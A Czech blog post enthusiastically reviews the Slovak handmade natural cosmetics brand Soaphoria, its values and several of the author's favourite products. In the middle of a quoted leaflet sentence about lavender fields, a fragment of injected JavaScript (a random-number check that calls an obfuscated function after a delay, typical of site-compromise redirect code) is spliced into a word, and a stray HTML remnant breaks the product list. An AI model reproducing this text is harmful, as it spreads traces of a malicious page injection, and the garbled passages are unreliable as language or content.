Soaphoria – slovenský klenot mezi přírodní kosmetikou

Google+ Pinterest LinkedIn Tumblr +

Vítejte ve světě Soaphorie, ve světě krásných momentů. Těmito slovy mě uvítal leták, přibalený ke kosmetice této značky. Nádhera, nádhera, nádhera. A takém pravda. Tahle kosmetika hýčká tělo i smysly. A já se do ní zamilovala.

Čistá práce
K hodnotám značky Soaphoria patří mimo jiné ruční výroba všech produktů, 100% rostlinné složky (vegetariánské a více než 90 % z nich dokonce veganské), báječná ekologická balení a samozřejmostí je také netestování na zvířatech.

Kromě produktů samotných jsem si oblíbila i jejich PR – jednoduchou grafiku, nádherné texty na obalech produktů i v letácích – bezproblémovou komunikaci a energii, která celou tuhle značku v mých očích pozvedává do obrovských výšin.  „Zahalte se do vůně levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andulových polí, užijte si mléčné potěšení se špetkou slaďoučkého medu, objevte poklay orientální noci,“ píše se v informačním letáku. A vy nemáte důvod jim to nevěřit…

V sortimentu Soaphoria najdete:

  • produkty péče o tělo, pleť, vlasy,
  • něco na zpříjemnění koupele,
  • i speciální řadu pro nejmenší – Babyphoria.

Voňavá tělová suflé, organické oleje, praktické a šetrné tuhé šampony a kondicionéry, naprosto úžasné, vláčné a výživné  balzámy na rty, to je jen malý výčet toho, co znám a vlastním já… A o čem už brzy napíšu, protože si to prostě nemůžu nechat pro sebe!

V mé sbírce najdete:

  • mrkvový olej na tělo i vlasy (protože mi dopomohl k nádhernému opálení!),
  • meduňkový balzám na rty (protože meduňka uklidňuje a mé rty jsou jí za to vděčné),
  • napařovací tabletky na obličej (protože jsem větší zázrak vživotě neviděla!),
  • tove-kremy“>královský oční gelkrém (protože krásně chladí a nedráždí).

Já sama se těším, až vám povím, co všechno tahle kosmetika umí! Nehledejte za tím žádný marketingový záměr. Nemám potřebu psát o věcech tak, jak mi někdo diktuje. Chci psát o tom, co mě zaujalo, co mi pomohlo, co mě oslovilo. A tahle bezva parta ze Slovenska si rozhodně zaslouží, aby se o ní vědělo. Jejich práce je krásná, voňavá, ale i sakra náročná. A oni ji přesto zbožňují. A tu svou odhodlanost a radost předávají dál…

Sdílet.

O autorovi

1 komentář

  1. Pingback: Péče o rty: Soaphoria, Alverde, Bioderma

Zanechte odpověď